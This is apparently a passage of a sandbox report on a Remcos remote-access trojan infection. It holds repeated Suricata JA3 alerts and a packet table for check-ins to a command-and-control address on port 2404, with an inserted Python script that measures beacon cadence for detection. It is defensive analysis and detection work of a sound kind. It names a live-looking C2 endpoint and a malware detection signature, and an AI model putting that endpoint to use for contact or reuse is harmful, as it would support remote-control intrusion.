2025-01-09T12:40:35.108834+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49823        87.120.116.245  2404       TCP
2025-01-09T12:40:37.743738+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49838        87.120.116.245  2404       TCP
2025-01-09T12:40:40.385934+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49853        87.120.116.245  2404       TCP
2025-01-09T12:40:43.040411+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49866        87.120.116.245  2404       TCP
2025-01-09T12:40:45.665483+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49882        87.120.116.245  2404       TCP
2025-01-09T12:40:48.274038+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49898        87.120.116.245  2404       TCP
2025-01-09T12:40:50.882902+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49911        87.120.116.245  2404       TCP
2025-01-09T12:40:53.519985+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49925        87.120.116.245  2404       TCP
2025-01-09T12:40:56.131088+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49945        87.120.116.245  2404       TCP
2025-01-09T12:40:58.780329+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49960        87.120.116.245  2404       TCP
2025-01-09T12:41:01.415862+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49975        87.120.116.245  2404       TCP
2025-01-09T12:41:04.060693+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49992        87.120.116.245  2404       TCP
2025-01-09T12:41:06.697404+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50004        87.120.116.245  2404       TCP
2025-01-09T12:41:09.322940+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50005        87.120.116.245  2404       TCP
2025-01-09T12:41:11.982686+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50006        87.120.116.245  2404       TCP
2025-01-09T12:41:14.718409+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50007        87.120.116.245  2404       TCP
2025-01-09T12:41:17.352580+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50008        87.120.116.245  2404       TCP
2025-01-09T12:41:19.978592+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50009        87.120.116.245  2404       TCP
2025-01-09T12:41:22.626778+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50010        87.120.116.245  2404       TCP
2025-01-09T12:41:25.280179+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50011        87.120.116.245  2404       TCP
2025-01-09T12:41:27.947950+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50012        87.120.116.245  2404       TCP
2025-01-09T12:41:30.625281+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50013        87.120.116.245  2404       TCP
2025-01-09T12:41:33.252560+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50014        87.120.116.245  2404       TCP
2025-01-09T12:41:35.824878+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50015        87.120.116.245  2404       TCP
2025-01-09T12:41:38.354220+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50016        87.120.116.245  2404       TCP
2025-01-09T12:41:40.854196+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50017        87.120.116.245  2404       TCP
2025-01-09T12:41:43.354145+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50018        87.120.116.245  2404       TCP
2025-01-09T12:41:45.823890+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50019        87.120.116.245  2404       TCP
2025-01-09T12:41:48.282019+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50020        87.120.116.245  2404       TCP
2025-01-09T12:41:50.664690+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50021        87.120.116.245  2404       TCP
2025-01-09T12:41:53.063685+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50022        87.120.116.245  2404       TCP
2025-01-09T12:41:55.417279+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50023        87.120.116.245  2404       TCP
2025-01-09T12:41:57.764991+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50024        87.120.116.245  2404       TCP
2025-01-09T12:42:00.095133+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50025        87.120.116.245  2404       TCP
2025-01-09T12:42:02.370189+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50026        87.120.116.245  2404       TCP
2025-01-09T12:42:04.636656+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50027        87.120.116.245  2404       TCP
2025-01-09T12:42:06.887519+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50028        87.120.116.245  2404       TCP
2025-01-09T12:42:09.126589+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50029        87.120.116.245  2404       TCP
2025-01-09T12:42:11.325361+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50030        87.120.116.245  2404       TCP
2025-01-09T12:42:13.501565+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50031        87.120.116.245  2404       TCP
2025-01-09T12:42:15.669064+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50032        87.120.116.245  2404       TCP
2025-01-09T12:42:17.809851+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50033        87.120.116.245  2404       TCP
2025-01-09T12:42:19.929670+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50034        87.120.116.245  2404       TCP
2025-01-09T12:42:22.246311+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50035        87.120.116.245  2404       TCP
2025-01-09T12:42:24.359128+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50036        87.120.116.245  2404       TCP
2025-01-09T12:42:26.434884+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50037        87.120.116.245  2404       TCP
2025-01-09T12:42:28.500791+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50038        87.120.116.245  2404       TCP
2025-01-09T12:42:30.525481+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50039        87.120.116.245  2404       TCP
2025-01-09T12:42:32.576357+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50040        87.120.116.245  2404       TCP
2025-01-09T12:42:34.603195+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50041        87.120.116.245  2404       TCP
2025-01-09T12:42:36.586212+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50042        87.120.116.245  2404       TCP
2025-01-09T12:42:38.607820+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50043        87.120.116.245  2404       TCP
2025-01-09T12:42:40.625452+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50044        87.120.116.245  2404       TCP
2025-01-09T12:42:42.605652+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50045        87.120.116.245  2404       TCP
2025-01-09T12:42:44.595670+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50046        87.120.116.245  2404       TCP
2025-01-09T12:42:46.526926+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50047        87.120.116.245  2404       TCP
2025-01-09T12:42:48.488805+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50048        87.120.116.245  2404       TCP
2025-01-09T12:42:50.400825+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50049        87.120.116.245  2404       TCP
2025-01-09T12:42:52.308655+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50050        87.120.116.245  2404       TCP
2025-01-09T12:42:54.239073+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50051        87.120.116.245  2404       TCP
2025-01-09T12:42:56.176972+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50052        87.120.116.245  2404       TCP
2025-01-09T12:42:58.073163+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50053        87.120.116.245  2404       TCP
2025-01-09T12:42:59.971189+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50054        87.120.116.245  2404       TCP
2025-01-09T12:43:02.008561+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50055        87.120.116.245  2404       TCP
2025-01-09T12:43:03.856990+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50056        87.120.116.245  2404       TCP
2025-01-09T12:43:05.736877+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50057        87.120.116.245  2404       TCP
2025-01-09T12:43:07.616989+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50058        87.120.116.245  2404       TCP
2025-01-09T12:43:09.462940+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50059        87.120.116.245  2404       TCP
2025-01-09T12:43:11.294959+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50060        87.120.116.245  2404       TCP
2025-01-09T12:43:13.127494+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50061        87.120.116.245  2404       TCP
2025-01-09T12:43:14.970620+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50062        87.120.116.245  2404       TCP
2025-01-09T12:43:16.819208+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50063        87.120.116.245  2404       TCP
2025-01-09T12:43:18.658973+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50064        87.120.116.245  2404       TCP
2025-01-09T12:43:20.485486+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50065        87.120.116.245  2404       TCP
2025-01-09T12:43:22.309451+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50066        87.120.116.245  2404       TCP
2025-01-09T12:43:24.106540+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50067        87.120.116.245  2404       TCP
2025-01-09T12:43:25.901857+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50068        87.120.116.245  2404       TCP
2025-01-09T12:43:27.707179+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50069        87.120.116.245  2404       TCP
2025-01-09T12:43:29.528329+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50070        87.120.116.245  2404       TCP
2025-01-09T12:43:31.310182+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50071        87.120.116.245  2404       TCP
2025-01-09T12:43:33.058075+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50072        87.120.116.245  2404       TCP
2025-01-09T12:43:34.811387+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50073        87.120.116.245  2404       TCP
2025-01-09T12:43:36.579695+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50074        87.120.116.245  2404       TCP
2025-01-09T12:43:38.322987+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50075        87.120.116.245  2404       TCP
2025-01-09T12:43:40.075533+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50076        87.120.116.245  2404       TCP
2025-01-09T12:43:41.826952+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50077        87.120.116.245  2404       TCP
2025-01-09T12:43:43.577002+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50078        87.120.116.245  2404       TCP
2025-01-09T12:43:45.327959+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50079        87.120.116.245  2404       TCP
2025-01-09T12:43:47.057659+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50080        87.120.116.245  2404       TCP
2025-01-09T12:43:48.804026+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50081        87.120.116.245  2404       TCP
2025-01-09T12:43:50.545968+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50082        87.120.116.245  2404       TCP
2025-01-09T12:43:52.260026+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50083        87.120.116.245  2404       TCP
2025-01-09T12:43:53.981994+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50084        87.120.116.245  2404       TCP
2025-01-09T12:43:55.701456+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50085        87.120.116.245  2404       TCP
2025-01-09T12:43:57.419560+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50086        87.120.116.245  2404       TCP
2025-01-09T12:43:59.159624+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50087        87.120.116.245  2404       TCP
2025-01-09T12:44:00.893431+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50088        87.120.116.245  2404       TCP
2025-01-09T12:44:02.572468+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50089        87.120.116.245  2404       TCP
2025-01-09T12:44:04.300919+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50090        87.120.116.245  2404       TCP
2025-01-09T12:44:06.013244+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50091        87.120.116.245  2404       TCP
2025-01-09T12:44:07.713576+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50092        87.120.116.245  2404       TCP
2025-01-09T12:44:09.440523+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  50093        87.120.116.245  2404       TCP
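The alert list above is a single JA3 signature firing once per TLS connection; what turns it from "one hit" into a C2 finding is the cadence: one destination, a fresh ephemeral source port per connection, and a near-constant gap between connections. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses rows laid out like the alert table (the first eight rows are copied from it and re-separated with tabs), groups them per host/destination and derives a beacon profile. The `min_hits` and `max_jitter_ratio` thresholds and all function names are assumptions chosen for the example.

```python
from datetime import datetime
from statistics import mean, pstdev

# First eight rows of the Suricata alert table above, tab-separated so they
# can be parsed. Column order is the report's own: Timestamp, SID, Signature,
# Severity, Source IP, Source Port, Dest IP, Dest Port, Protocol.
SAMPLE_ALERTS = "\n".join([
    "2025-01-09T12:40:05.780254+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49709\t87.120.116.245\t2404\tTCP",
    "2025-01-09T12:40:08.414907+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49711\t87.120.116.245\t2404\tTCP",
    "2025-01-09T12:40:11.055869+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49713\t87.120.116.245\t2404\tTCP",
    "2025-01-09T12:40:14.057305+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49714\t87.120.116.245\t2404\tTCP",
    "2025-01-09T12:40:16.715765+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49715\t87.120.116.245\t2404\tTCP",
    "2025-01-09T12:40:19.333540+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49717\t87.120.116.245\t2404\tTCP",
    "2025-01-09T12:40:21.943828+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49736\t87.120.116.245\t2404\tTCP",
    "2025-01-09T12:40:24.572495+0100\t2036594\tET JA3 Hash - Remcos 3.x/4.x TLS Connection\t1\t192.168.2.5\t49754\t87.120.116.245\t2404\tTCP",
])

# SID of the ET rule in the table above.
REMCOS_JA3_SID = 2036594


def parse_alerts(text):
    """Parse tab-separated alert rows into dicts with typed fields."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = line.split("\t")
        alerts.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid),
            "signature": sig,
            "severity": int(sev),
            "src": src,
            "sport": int(sport),
            "dst": dst,
            "dport": int(dport),
            "proto": proto,
        })
    return alerts


def beacon_profile(alerts, sid, min_hits=5, max_jitter_ratio=0.25):
    """Characterise the cadence of one SID per (source host, destination, port).

    Returns one dict per group with the hit count, the number of distinct
    source ports (a new ephemeral port per hit means a new connection each
    time), the mean gap between hits, the jitter as a coefficient of
    variation (population stdev / mean) and a beacon verdict. The thresholds
    are assumed values for this example, not figures from the report.
    """
    groups = {}
    for a in alerts:
        if a["sid"] != sid:
            continue
        groups.setdefault((a["src"], a["dst"], a["dport"]), []).append(a)

    profiles = []
    for (src, dst, dport), hits in groups.items():
        hits.sort(key=lambda a: a["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
        interval = mean(gaps) if gaps else 0.0
        jitter = pstdev(gaps) if len(gaps) > 1 else 0.0
        cv = jitter / interval if interval else 0.0
        profiles.append({
            "src": src,
            "dst": dst,
            "dport": dport,
            "hits": len(hits),
            "distinct_sports": len({a["sport"] for a in hits}),
            "mean_interval_s": round(interval, 3),
            "jitter_cv": round(cv, 3),
            "is_beacon": len(hits) >= min_hits and cv <= max_jitter_ratio,
        })
    return profiles


if __name__ == "__main__":
    for p in beacon_profile(parse_alerts(SAMPLE_ALERTS), REMCOS_JA3_SID):
        print(p)
```

On the eight rows above this reports one group, 192.168.2.5 to 87.120.116.245:2404, eight hits on eight distinct source ports, a mean gap of about 2.7 s and a jitter ratio under 0.05, which is the signature of a fixed-sleep check-in loop rather than user-driven traffic. In a real pipeline the same grouping would be run over the EVE JSON alert stream instead of a pasted table, and the jitter threshold tuned against known-good periodic services before alerting on it.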
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Jan 9, 2025 12:40:03.954257965 CET  49709        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:04.158376932 CET  2404         49709      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:04.158476114 CET  49709        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:04.163965940 CET  49709        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:04.168755054 CET  2404         49709      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:05.780183077 CET  2404         49709      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:05.780253887 CET  49709        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:05.780392885 CET  49709        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:05.785128117 CET  2404         49709      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:06.792486906 CET  49711        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:06.797250032 CET  2404         49711      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:06.797343969 CET  49711        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:06.801162958 CET  49711        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:06.805970907 CET  2404         49711      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:08.414829016 CET  2404         49711      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:08.414906979 CET  49711        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:08.414971113 CET  49711        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:08.419717073 CET  2404         49711      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:09.428344011 CET  49713        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:09.433279991 CET  2404         49713      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:09.433358908 CET  49713        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:09.437355995 CET  49713        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:09.442140102 CET  2404         49713      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:11.055780888 CET  2404         49713      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:11.055869102 CET  49713        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:11.055943966 CET  49713        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:11.060672998 CET  2404         49713      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:12.057766914 CET  49714        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:12.440633059 CET  2404         49714      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:12.440738916 CET  49714        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:12.444406033 CET  49714        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:12.449259043 CET  2404         49714      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:14.057197094 CET  2404         49714      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:14.057305098 CET  49714        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:14.057373047 CET  49714        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:14.062160015 CET  2404         49714      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:15.073535919 CET  49715        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:15.078378916 CET  2404         49715      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:15.078484058 CET  49715        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:15.082231998 CET  49715        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:15.087054968 CET  2404         49715      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:16.715677977 CET  2404         49715      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:16.715764999 CET  49715        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:16.715853930 CET  49715        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:16.720664978 CET  2404         49715      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:17.729746103 CET  49717        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:17.734621048 CET  2404         49717      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:17.734715939 CET  49717        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:17.738823891 CET  49717        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:17.743556976 CET  2404         49717      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:19.333465099 CET  2404         49717      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:19.333539963 CET  49717        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:19.333611965 CET  49717        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:19.338411093 CET  2404         49717      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:20.339080095 CET  49736        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:20.343910933 CET  2404         49736      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:20.344011068 CET  49736        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:20.347769022 CET  49736        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:20.352663994 CET  2404         49736      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:21.943751097 CET  2404         49736      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:21.943828106 CET  49736        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:21.943911076 CET  49736        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:21.948693991 CET  2404         49736      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:22.948687077 CET  49754        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:22.954399109 CET  2404         49754      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:22.954482079 CET  49754        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:22.959573030 CET  49754        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:22.964368105 CET  2404         49754      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:24.572315931 CET  2404         49754      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:24.572494984 CET  49754        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:24.572691917 CET  49754        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:24.577466965 CET  2404         49754      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:25.589152098 CET  49772        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:25.593893051 CET  2404         49772      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:25.594000101 CET  49772        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:25.597965956 CET  49772        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:25.602786064 CET  2404         49772      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:27.209743023 CET  2404         49772      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:27.209877968 CET  49772        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:27.209944963 CET  49772        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:27.215641975 CET  2404         49772      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:28.214049101 CET  49787        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:28.218880892 CET  2404         49787      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:28.218996048 CET  49787        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:28.222901106 CET  49787        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:28.227679968 CET  2404         49787      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:29.836998940 CET  2404         49787      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:29.837074041 CET  49787        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:29.837127924 CET  49787        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:29.841887951 CET  2404         49787      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:30.839623928 CET  49806        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:30.844389915 CET  2404         49806      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:30.844470024 CET  49806        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:30.849373102 CET  49806        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:30.854156971 CET  2404         49806      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:32.462187052 CET  2404         49806      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:32.462266922 CET  49806        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:32.462343931 CET  49806        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:32.467113972 CET  2404         49806      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:33.463927031 CET  49823        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:33.468753099 CET  2404         49823      87.120.116.245  192.168.2.5
Jan 9, 2025 12:40:33.468846083 CET  49823        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:33.472382069 CET  49823        2404       192.168.2.5     87.120.116.245
Jan 9, 2025 12:40:33.477672100 CET  2404         49823      87.120.116.245  192.168.2.5
